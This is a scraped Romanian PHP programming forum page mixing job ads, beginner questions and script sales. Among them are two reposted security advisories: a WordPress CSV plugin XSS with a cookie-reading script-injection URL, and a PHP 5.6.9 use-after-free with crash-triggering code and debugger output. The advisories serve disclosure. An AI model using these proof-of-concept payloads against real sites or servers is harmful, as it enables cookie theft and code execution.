Search the Community

Salut, Caut programator, pentru un website de fotbal/stats/team & player, wordpress sau de la 0. informatiile le primesc in pdf sau .xlsx demo: https://drive.google.com/file/d/1v_jVX9BB0hRWEB3lJPJsrsQUMZ6lHpZo/view?usp=sharing https://drive.google.com/file/d/1AruAtdTRH3Hcixqb-gKVe3xhRlxxhSVs/view?usp=sharing https://drive.google.com/file/d/103lgF6skX48FzbN5jwP-b1lKRvcHV93e/view?usp=sharing https://drive.google.com/file/d/1OTLbQi8z2AukPud3V2pYEbGDw0o5R4h8/view?usp=sharing astept pm cu pret!

Cunoștințe avansate PHP/ MySQL, HTML/CSS/JS (jQuery), Javascriptengleză nivel mediuExperienta in proiecte de ecommerce ( WordPress woocommerce, OpenCart, Prestashop, Magento ), implementare API.Vei lucra în cadrul unor proiecte de ecommerce. Căutăm oameni pro-activi, care rezolvă problemele până la capăt, și care au dorința și capacitatea de a crea propriile structuri și implementa propria viziune pentru soluționarea unui task.

**deleted**

WordPress CSV Import-Export plugin version 1.1 suffers from a cross site scripting vulnerability. Product: CSV Import-Export Wordpress Plugin - https://wordpress.org/plugins/csv-import-export/ Vendor: eSparkBiz Tested version: 1.1 CVE ID: CVE-2017-17753 ** CVE description ** Multiple cross-site scripting (XSS) vulnerabilities in the esb-csv-import-export plugin through 1.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) cie_type, (2) cie_import, (3) cie_update, or (4) cie_ignore parameter to includes/admin/views/esb-cie-import-export-page.php. ** Technical details ** In the conditional block at includes/admin/views/esb-cie-import-export-page.php:21, the cie_type, cie_import, cie_update and cie_ignore HTTP GET parameters are echoed back to user without proper sanitization. Vulnerable code: https://plugins.trac.wordpress.org/browser/csv-import-export/trunk/includes/admin/views/esb-cie-import-export-page.php#L21 ** Proof of Concept ** http://<host>/wordpress/wp-admin/admin.php?page=esb-cie-import-export-page&cie_ignore=<script>alert(document.cookie);</script> ** Solution ** No fix available yet. ** Timeline ** 12/10/2017: vendor contacted; no reply 24/10/2017: vendor contacted; no reply 31/10/2017: vendor contacted; vendor asks for more details then stops replying 05/12/2017: vendor contacted; no reply 19/12/2017: report published ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI) _________________________________________________________________________________________________________________________ Ce message et ses pieces jointes peuvent contenir des informations confidentielles ou privilegiees et ne doivent donc pas etre diffuses, exploites ou copies sans autorisation. Si vous avez recu ce message par erreur, veuillez le signaler a l'expediteur et le detruire ainsi que les pieces jointes. Les messages electroniques etant susceptibles d'alteration, Orange decline toute responsabilite si ce message a ete altere, deforme ou falsifie. Merci. This message and its attachments may contain confidential or privileged information that may be protected by law; they should not be distributed, used or copied without authorisation. If you have received this email in error, please notify the sender and delete this message and its attachments. As emails may be altered, Orange is not liable for messages that have been modified, changed or falsified. Thank you. # 0day.today [2017-12-20] # Source: 0day.today

About BotMan BotMan is a framework agnostic PHP library that is designed to simplify the task of developing innovative bots for multiple messaging platforms, including Slack, Telegram, Microsoft Bot Framework, Nexmo, HipChat, Facebook Messenger and WeChat. $botman->hears('I want cross-platform bots with PHP!', function (BotMan $bot) { $bot->reply('Look no further!'); }); Documentation You can find the BotMan documentation at http://botman.io Support the development Do you like this project? Support it by donating PayPal: Donate Patreon: Donate Contribuiting Please see CONTRIBUTING for details. Security Vulnerabilities If you discover a security vulnerability within BotMan, please send an e-mail to Marcel Pociot at m.pociot@gmail.com. All security vulnerabilities will be promptly addressed. License BotMan is free software distributed under the terms of the MIT license. Download botman-master.zip Sources: https://botman.io https://github.com/botman/botman

Nu sunt programator de php...insa acum ceva timp am incropit un script cu care preluam feed-ul RSS de pe agerpress de la adresa: Agerpress RSS ... acum s-a schimbat ceva si nu mai functioneaza. Poate ma ajuta cineva. Codul este urmatorul: <?php setlocale(LC_ALL, array('ro_RO.ISO8859-1', 'ro_RO.ISO-8859-1', 'ro', 'ro_RO', 'rom', 'romanian')); $xml=simplexml_load_file("https://www.agerpres.ro/home.rss"); $cnt = count($xml->channel->item); $count = 10; //Numarul de stiri afisate for($i=0; $i<$cnt; $i++) { $url = $xml->channel->item[$i]->link; $titlu = $xml->channel->item[$i]->title; $data = $xml->channel->item[$i]->pubDate; $imagine = $xml->channel->item[$i]->description->img->_src; $content = $xml->channel->item[$i]->description->__text; if($count > 0){ $date = date('d.m.Y - H:i', strtotime($data)); echo '<div>'; echo '<div>'; echo '<img src='.$imagine.' alt="">'; echo '</div>'; echo '<h4><a>'.$titlu.'</a></h4>'; echo '<div>'; echo '<span>publicat la '.$date.'</span>'; echo '</div>'; echo '<p>'.$content.'</p>'; echo '<a href="'.$url.'" >Citeşte</a>'; echo '</div>'; } $count--; } ?> Multumesc...

Salut. Vreau să știu dacă ar fi o idee bună să învăț în continuare Django și dacă aș putea face bani făcând site-uri cu el sau dacă ar trebui să trec pe PHP (+ framework) pentru că este mai popular și se cere mai mult? Din câte am văzut pe site-urile de freelance, prea puține proiecte se cer în Django, mă cam descurajează acest lucru. Sunt la început cu Django, nu pot spune că am prea multă experiență de lucru cu el sau că am făcut nu știu ce proiecte. Nu mă încântă foarte mult să merg pe PHP, doar dacă sunt nevoit pentru a câștiga ceva bani. Sunt foarte nesigur pe mine în cazul acestei alegeri, de aici și motivul topicului. Sunt conștient de faptul că banii nu se fac atât de repede, însă vreau să am o pornire bună, nu să mă reprofilez pe „ultima sută de metri”, adică nu vreau să depun atât de mult timp să învăț Django, ca pe urmă să văd că nimeni n-are nevoie și că ar trebui să învăț PHP. Vreau să menționez că nu mă gândesc să trec pe PHP că fac duzina de bani, mă gândesc la ce-i mai rău, în sensul că dacă fac foarte puțin cu Django, nu e ok. Înțeleg și principiul: dacă n-o să-mi placă ce fac, n-o să câștig prea mult. Mi-e frică mai mult să fac ce-mi place și să nu câștig decât invers. În plus, nu văd ideea de a învăța PHP așa de rea, doar mă simt mai comod cu Django. O altă problemă, în afară de cea a freelance-ului, este: dacă se merită să merg mai departe cu Django pentru un potențial job stabil. Însă, nu mă grăbesc cu acest lucru, mai am puțin până atunci. P.S.: Scuzați dacă nu e categoria potrivită subiectului, rog un moderator să o mute în caz de ceva. Mulțumesc anticipat pentru răspunsuri.

Avem nevoie de un script care sa importe niste date din mongodb(text si imagini) si sa le posteze intr-un wordpress. Postarea din wordpress trebuie populata cu datele din mongodb. De asemnea wordpress-ul va avea si 2 plugin-uri(unul de seo si un social poster) ce vor trebui populate deasemenea cu datele din mongodb. Amandoua plugin-uri au row-uri vizibile pe pagina de postare a wordpress-ului. Pluginul de seo trebuie sa primeasca date la fiecare postare Pluginul social poster este facut astfel incat fiecare postare in wordpress sa fie automat publicata pe retelele de socializare(Avem nevoie ca scriptul sa posteze pe retelele de socializare numai odata din 30 de postari) Scriptul trebuie hostat pe un server separat impreuna cu mongodb si sa "pusheze" informatia catre wordpress. Se pot folosi xmlrpc sau un plugin custom pe wordpress care sa accepte datele trimise(daca se foloseste plugin-ul nu este necesar sa aibe nici o setare vizuala din admin-ul wordpressului)

Salutare, Eu am invatat recent (cateva luni) web development ( html,css,javascript PHP Procedural). Sunt junior si mi-au placut foarte mult cursurile de pe w3schools.com In cautarea unul loc de munca, se pare ca fara OOP & MVC nu angajeaza nimeni, Intrebarea mea este: stie cineva un site unde pot invata MVC PHP lucrand efectiv, ceva in gen w3schools? Also, este CodeIgniter un framework bun pt incepatori ca mine? Cele mai multe cursuri sunt cu video-uri, ceea ce le face plictisioare(parerea mea). Thanks guys!

Salutare, Dupa cum spune si titlul caut 4 programatori capabili si muncitori. Pozitiile necesare sunt 2 de front-end si 2 de back-end. Jobul permite munca in regim remote programul fiind de 8 ore pe zi. Probabil este de la sine inteles ca nu vreau sa ne pierdem timpul unii cu altii si ca ceea ce incercam sa facem se numeste business. Primeaza in fata oricarui lucru onestitatea, determinarea,integritatea si mai ales seriozitatea. Cele 8 ore de munca trebuiesc cumva alese in cursul zilei in asa fel incat un minim de 3-4 ore sa te poti intersecta cu ceilalti membrii ai echipei. Daca consideri ca vei putea fi disponibil/a pe perioada veri pentru o perioada de minim 3 luni poti aplica linistit/a. Salariul este in functie de cunostintele tale si disponibilitatea ta asa ca nu iti fie frica sa ceri cat consideri ca meriti. Oferta ta poate fi de genul ron/ora ori ron/luna. Cateva lucruri care te-ar putea ajuta: - referinte de la fosti clienti/angajatori. - cateva exemple recente de munca care ai facut-o. - contributia ta in diferite proiecte. Va stau la dispozitie pentru orice informatie sau pentru a aplica: radustefan820@gmail.com Aceasta propunere nu vine din partea unei firme ce crede ca un web developer, programator trebuie sa se ocupe de 3 posturi intr-o firma. Va multumesc frumos pentru interesul acordat si ca ati pierdut cateva minute sa cititi post-ul meu. O zi cat mai buna, Radu

buna seara am o problema la php ... am instalat lamp php5 etc da pe server local nu ami ruleaza fiserele php (apar doar o pagina goala alba) doar html , sunt incepator poate fac eu ceva gresit

Product Avactis PHP Shopping Cart Version 4.7.9.Next.47900 Full Disclosure EXPLOIT DB

Care este cea mai buna metoda pentru a detecta daca un utilizator foloseste proxy atunci cand intra pe un site ? Stiu ca unele proxy sunt imposibil de detectat, ma intereseaza sa le detectez pe alea care nu il protejeaza 100% pe utilizator. Momentan folosesc acest cod PHP , dar este o metoda veche si unele proxy nu seteaza Headers. Se poate face ceva cu JavaScript ? Sau alte metode PHP ? Am mai vazut o metoda care face reverse si verifica portul , nu este ok , se incarca greu pagina si porturile sunt multe iar rezultatul poate fi fals pozitiv. Nu vreau sa folosesc API sau Servicii oferite cu BlackListuri sau etc... $proxy_headers = array( 'HTTP_VIA', 'HTTP_X_FORWARDED_FOR', 'HTTP_FORWARDED_FOR', 'HTTP_X_FORWARDED', 'HTTP_FORWARDED', 'HTTP_CLIENT_IP', 'HTTP_FORWARDED_FOR_IP', 'VIA', 'X_FORWARDED_FOR', 'FORWARDED_FOR', 'X_FORWARDED', 'FORWARDED', 'CLIENT_IP', 'FORWARDED_FOR_IP', 'HTTP_PROXY_CONNECTION' ); foreach($proxy_headers as $x){ if (isset($_SERVER[$x])) echo("You are using a proxy!"); } UPDATE (poate mai are nevoie cineva) : What is a "WebRTC leaks"? WebRTC implement STUN (Session Traversal Utilities for Nat), a protocol that allows to discover the public IP address. Live Demo : https://diafygi.github.io/webrtc-ips/ More Info : https://www.privateinternetaccess.com/forum/discussion/8204/how-to-stop-webrtc-local-ip-address-leaks-on-google-chrome-and-mozilla-firefox-while-using-private-i Am intrat cu proxy si mi-a afisat Ip-ul real, functioneaza in Chrome si Firefox. Cu VPN nu a reusit sa vada ip-ul real. Pe Android si alte browsere , din ce am citit , nu functioneaza. Pentru a dezactiva WebRTC : Mozilla Firefox: Type "about:config” in the address bar. Scroll down to “media.peerconnection.enabled”, double click to set it to false. Google Chrome: Install Google official extension WebRTC Network Limiter. Thanks to

Salut! Sunt interesata de programatori back-end . Este vorba despre o colaborare pe termen lung, pentru o aplicatie web. Detalii : // Trimiteti PM pentru mail

Salut! De ceva timp incerc sa invat php acasa, si am reusit sa invat lucrurile de baza, dar doresc sa merg la cursuri in Bucuresti, pt ca invat mai bine atunci cand cineva imi explica lucrurile amanuntit. Daca ma poate ajuta cineva cu un trainer bun, prietenii m-au indrumat catre infoacademy.ro. Dar cele 25 de ore consider ca sunt cam putine. Astept cometariile voatre.

Sa povestesc de la inceput, am vazut o 3 pagini web la cineva, mi-au placut, si i le-am cerut. Acum cred ca doar a facut misto de mine, pentru ca cunostinta mea in programare se rezuma la font color="red" Acele pagini au si 2 form-uri, care dupa mintea mea trebuiau sa se duca undeva, intr-un mail. Asa ca m-am apucat sa rup google-ul si yt-ul in 2 cautand cum sa se duca datele in mail-ul meu. Am descarcat zeci de prog si m-am batut cu al'de Apache si C++ pana am ajuns la concluzia ca am nevoie de ajutor specializat. Parerea mea e ca el a mai pastrat niste fisiere in care puteam modifica unde sa ajunga datele(aici fiind partea in care a facut misto de mine). Rugamintea mea din sufletel ar fii sa ma ajute si pe mine cineva care dispune de timp si rabadare; As posta aici codul,daca as stii de unde sa-l iau sau ce sa iau. Da, sunt praf, dar imi dau silinta sa nu mai fiu. Mersi frumos

Job Bucuresti! Lucian & Parters SRL-D (site in constructie) este un start-up cu o echipa tanara, ambitii mari si proiecte in asteptare gata sa fie dezvoltate. Prin urmare cautam developeri incepatori sau experimentati care au finalizat cel putin un proiect in Laravel. Orice alte cunostinte de programare pentru web sunt binevenite. Principala activitate reprezinta dezvoltarea de aplicatii web in PHP/MySQL, CSS/HTML folosind in principal framework-ul Laravel 5 conform cerintelor clientului de la sediul firmei situat in zona Piata Romana. Salariul va fi unul de maximum 3000 RON pentru inceput in functie de cunostinte, experienta etc. cu posiblitatea de marire pe parcurs ce start-up-ul va creste. Cei interesati va rog sa-mi trimite-ti un pm cu cv-ul si proiectele voastre. EXTRA: cautam un profesionist Laravel 5 "gen freelancer" dar sa poata lucra de la sediul firmei impreuna cu clientul pentru un proiect important timp de o luna. Rog numai cei seriosi.

Ma joc de ceva vreme cu php. Fac fel si fel de lucruri, le modific, incerc alte metode, functii, incerc sa gandesc problema din perspective diferite si evident ma blochez. Am facut un script php, upload file, incerc sa abordez stilul oop, nu stiu cat de bine imi iasa, ce gresesc si ce fac bine, anyway, m-am blocat la ceva mediocru si nu inteleg ce gresesc. Deci: index.php upload.php check.php edit: m-am grabit sa postez si am uitat sa specific unde m-am blocat , so, am 2 clase, una uploadeaza fisierul, alta verifica fisierul sa fie in anumiti parametri, e ceva simplu, extensia si marimea fisierului. Logica mea a fost: Clasa UploadFile este mostenita de CheckFile, deci apelez clasa CheckFile, fac verificarea fisierelor IF size true -> next -> IF extension true -> upload. Dar nu imi iasa nici cum, atat am invartit lucrurile incat am lasat-o balta. Nu luati in seama comentariile idioate din script, le folosesc sa ma ghidez ..

Build your own php classified script website in just few clicks , SfClassi is efficiently developed PHP Classifieds script . SfClassi is web software to create classifieds using web based framework which is highly develop in Symfony MVC Framework.Very easy to use and SEO friendly software. Build your own php classified script website in just few clicks. SfClassi impedes to generate very heavy revenues for you . simple and vital PHP + MySQL based classifieds script with all inbuilt options provides one step solution. It is professionally developed in PHP based Symfony framework with MySQL backend. Customize SfClassi as per your requirement in low cost 5 USD/ hr Demo URL :http://www.sfclassi.com/ Front : SfClassi PHP Script DEMO Back : Welcome SfClassi Administrator Panel Email: info@sfclassi.com password : sfclassi123 OFFERS Free SetUp Free life time Supports Free life time upgrade latest version KEY FEATURES FRONT END Post Free and paid Classified ads Classified ads search by Category Classified ads list by Category Featured Classified ads list by Category Featured Classified ads Unregister or Register user post ads User my account section User can contact thru phone or email User can post featured ads ( PAID ADS ) SEO Friendly All Pages Paid Advertise on Site Multiple Language And more BACK END Classified Ads Management User Management Categories Management Advertise Management Content Management Multiple Language Location Management Paypal Payment Setting User control from setting And more SERVER REQUIREMENT PHP Version 5.2 or greater MySQL 5.0 or above GD2 for the image upload and resize functions. https://www.mediafire.com/?53sw9qq6emdd4ot

Caut persoana priceputa in PHP si CSS cu experienta in Moodle pentru un proiect relativ scurt, avand urmatoarele 2 faze: 1. Adaptare tema Moodle existenta (de pe themeforest.net) de la compatibilitatea curenta 2.6 la 2.9+ incat design-ul sa fie unul responsive, fara bug-uri si avand branding-ul specificat de mine (voi da grafica, culorile dorite, etc.) 2. Scriere plugin php pentru Moodle versiunea 2.9+ incat sa ofere un "analytics" dupa specificatiile mele Pret: negociabil, in functie de experienta, portofoliu si recomandari. Plata prin PayPal sau transfer bancar. Pentru peace of mind putem face un proiect privat printr-un site de freelanceri dorit (momentan detin conturi cu rep 100% de employer pe odesk.com si freelancer.com) sau pentru un cost mai redus (echivalent cu timpul pierdut), pot face un contract de "consultanta" pe firma mea ori chiar contract temporar de munca (daca doriti sa adaugati la CV). Skype: aa7670

vand scriptul php pentru un un social network gen facebook :PHP Scripts - Elitenetwork - Advanced Social Network Script | CodeCanyon aici aveti demo il dau la jumatate de pret

Use-After-Free in PHP May 20, 2015 Advisory ID: HTB23262 Product: PHP Vendor: PHP Group Vulnerable Versions: 5.6.9 and probably prior Tested Version: 5.6.9 Advisory Publication: May 20, 2015 [without technical details] Vendor Notification: May 20, 2015 Vendor Fix: June 2, 2015 Public Disclosure: June 10, 2015 Latest Update: June 9, 2015 Vulnerability Type: Use After Free [CWE-416] CVE Reference: Pending Risk Level: Medium CVSSv2 Base Score: 4.6 Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab Advisory Details: High-Tech Bridge Security Research Lab discovered use-after-free vulnerability in a popular programming language PHP, which can be exploited to cause crash and possibly execute arbitrary code on the target system. The vulnerability resides within the 'spl_heap_object_free_storage()' PHP function when trying to dereference already freed memory. A local attacker can cause segmentation fault or possibly execute arbitrary code on the target system with privileges of webserver. Below is a simple code that will trigger a crash: <?php class SplMinHeap1 extends SplMinHeap { public function compare($a, $ { return -parent::notexist($a, $; } } $h = new SplMinHeap1(); $h->insert(1); $h->insert(6); $h->insert(5); $h->insert(2); ?> Running the following PoC we get: gdb-peda$ r ~/Desktop/heap_uaf.php Starting program: /usr/local/bin/php ~/Desktop/heap_uaf.php PHP Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Fatal error: Call to undefined method SplMinHeap::notexist() in /home/test/Desktop/heap_uaf.php on line 4 Program received signal SIGSEGV, Segmentation fault. [----------------------------------------------------------------------- ---registers-------------------------------------------------------------------- -------] RAX: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBX: 0x8000000 RCX: 0xcd0458 ("/home/test/De"...) RDX: 0x16f RSI: 0xcd0458 ("/home/test/De"...) RDI: 0x5a5a5a5a5a5a5a5a (ZZZZZZZZ) RBP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RSP: 0x7fffffffc570 --> 0x7fffffffc5a0 --> 0x7fffffffc5d0 --> 0x7fffffffc600 --> 0x7fffffffc630 --> 0x7fffffffc750 --> 0x7fffffffc850 --> 0x7fffffffc9b0 --> 0x7fffffffdcf0 --> 0x7fffffffde50 --> 0x0 RIP: 0x82a96f (<zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10]) R8 : 0x269 R9 : 0x0 R10: 0x7fffffff9b20 --> 0x0 R11: 0x7ffff71102f0 --> 0xfffda6c0fffda3ef R12: 0x4209e0 (<_start>: xor ebp,ebp) R13: 0x7fffffffdf30 --> 0x2 R14: 0x0 R15: 0x0 [-------------------------------------------------------------------------- ---code------------------------------------------------------------------------- ----] 0x82a964 <zval_delref_p+1>: mov rbp,rsp 0x82a967 <zval_delref_p+4>: mov QWORD PTR [rbp-0x8],rdi 0x82a96b <zval_delref_p+8>: mov rax,QWORD PTR [rbp-0x8] => 0x82a96f <zval_delref_p+12>: mov eax,DWORD PTR [rax+0x10] 0x82a972 <zval_delref_p+15>: lea edx,[rax-0x1] 0x82a975 <zval_delref_p+18>: mov rax,QWORD PTR [rbp-0x8] 0x82a979 <zval_delref_p+22>: mov DWORD PTR [rax+0x10],edx 0x82a97c <zval_delref_p+25>: mov rax,QWORD PTR [rbp-0x8] [-------------------------------------------------------------------- --------stack------------------------------------------------------------------- ----------] As seen above when trying to dereference the value from $rax (which has been already freed) PHP crashes. Stopped reason: SIGSEGV 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 411 return --pz->refcount__gc; Running the backtrace command we can see a couple of freed variables: zval_ptr, pz gdb-peda$ bt #0 0x000000000082a96f in zval_delref_p (pz=0x5a5a5a5a5a5a5a5a) at /home/test/Desktop/php-5.6.9/Zend/zend.h:411 #1 0x000000000082aafb in i_zval_ptr_dtor (zval_ptr=0x5a5a5a5a5a5a5a5a, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute.h:76 #2 0x000000000082bdcb in _zval_ptr_dtor (zval_ptr=0x7ffff7fcba88, __zend_filename=0xcd0458 "/home/test/De"..., __zend_lineno=0x16f) at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:424 #3 0x00000000006e5c1a in spl_heap_object_free_storage (object=0x7ffff7dfdfa0) at /home/test/Desktop/php-5.6.9/ext/spl/spl_heap.c:367 #4 0x000000000087f566 in zend_objects_store_free_object_storage (objects=0x102e640 <executor_globals+928>) at /home/test/Desktop/php-5.6.9/Zend/zend_objects_API.c:97 #5 0x000000000082b89e in shutdown_executor () at /home/test/Desktop/php-5.6.9/Zend/zend_execute_API.c:290 #6 0x0000000000841a4c in zend_deactivate () at /home/test/Desktop/php-5.6.9/Zend/zend.c:960 #7 0x00000000007a7c40 in php_request_shutdown (dummy=0x0) at /home/test/Desktop/php-5.6.9/main/main.c:1882 #8 0x00000000008f6501 in do_cli (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1177 #9 0x00000000008f6d8b in main (argc=0x2, argv=0x1032560) at /home/test/Desktop/php-5.6.9/sapi/cli/php_cli.c:1378 #10 0x00007ffff6faaec5 in __libc_start_main () from /lib/x86_64-linux-gnu/libc.so.6 #11 0x0000000000420a09 in _start () Lastly, from stack #2 we clearly see that the zval_ptr pointer (0x7ffff7fcba88) points to freed memory: gdb-peda$ x/50xw 0x7ffff7fcba88 0x7ffff7fcba88: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7 ffff7fcba98: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaa8: 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbab8: 0x5a5a5a5a 0x5a5a5a5a 0x5 a5a5a5a 0x5a5a5a5a 0x7ffff7fcbac8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbad8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbae8: 0x 5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbaf8: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb08: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5 a5a 0x7ffff7fcbb18: 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb28 : 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb38: 0x5a5a5a5a 0x5a5a 5a5a 0x5a5a5a5a 0x5a5a5a5a 0x7ffff7fcbb48: 0x5a5a5a5a 0x5a5a5a5a This vulnerability was successfully reproduced Ubuntu 14.04.1 LTS (32 bit and 64 bit) on the latest version of PHP 5.6.9. ImmuniWeb® On-Demand Web Application Penetration Test Solution: Apply Vendor's patch. More Information: https://bugs.php.net/bug.php?id=69737 72.52.91.13 Git - php-src.git/commit References: [1] High-Tech Bridge Advisory HTB23262 - https://www.htbridge.com/advisory/HTB23262 - Use-After-Free in PHP. [2] PHP - PHP: Hypertext Preprocessor - PHP is a popular general-purpose scripting language that is especially suited to web development. [3] Common Weakness Enumeration (CWE) - CWE - Common Weakness Enumeration - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [4] ImmuniWeb® - a PCI compliant web application penetration test combined with managed vulnerability scan. Configure, schedule, and manage online 24/7. Source : https://www.htbridge.com/advisory/HTB23262

The PHP development team announces the immediate availability of PHP 7.0.0 Alpha 1. This release marks the beginning of the PHP 7 major series. All users of PHP are encouraged to test this version carefully, and report any bugs and incompatibilities in the bug tracking system. THIS IS A DEVELOPMENT PREVIEW - DO NOT USE IT IN PRODUCTION! PHP 7.0.0 Alpha 1 comes with new version of the Zend Engine with features such as (incomplete list): Improved performance: PHP 7 is up to twice as fast as PHP 5.6 Consistent 64-bit support Many fatal errors are now Exceptions Removal of old and unsupported SAPIs and extensions The null coalescing operator (??) Combined comparison Operator (<=>) Scalar Type Declarations Anonymous Classes For more information on the new features and other changes, you can read the NEWS file or the or the UPGRADING file for a complete list of upgrading notes. These files can also be found in the release archive. For source downloads of PHP 7.0.0 Alpha 1 please visit the download page, Windows binaries can be found on windows.php.net/qa/. The second alpha will be released on 25th of June. You can also read the full list of planned releases on our wiki. Thank you for helping us making PHP better. Source

Vreau sa rulez un player flash din php. Link-ul pe care il apelez in browser merge, dar daca il import in php nu imi mai ia parametri pe care ii dau fisierului flash. Link-ul care player: https://www.clipurivideo.net/vechi/player.swf?file=https://www.clipurivideo.net/media/b5ffd74fe774483c1cb15272c83156d6.mp4 Continutul fisierului php: header("Content-Type: application/x-shockwave-flash"); $file_real = 'https://www.clipurivideo.net/vechi/player.swf?file=https://www.clipurivideo.net/media/b5ffd74fe774483c1cb15272c83156d6.mp4'; $stream = fopen($file_real, 'rb'); fpassthru($stream);

Am diferite proiecte in curs de executie si am nevoie de un baiat bun pe html, php pentru a-mi face diferite pagini, scripturi. PM pentru detalii !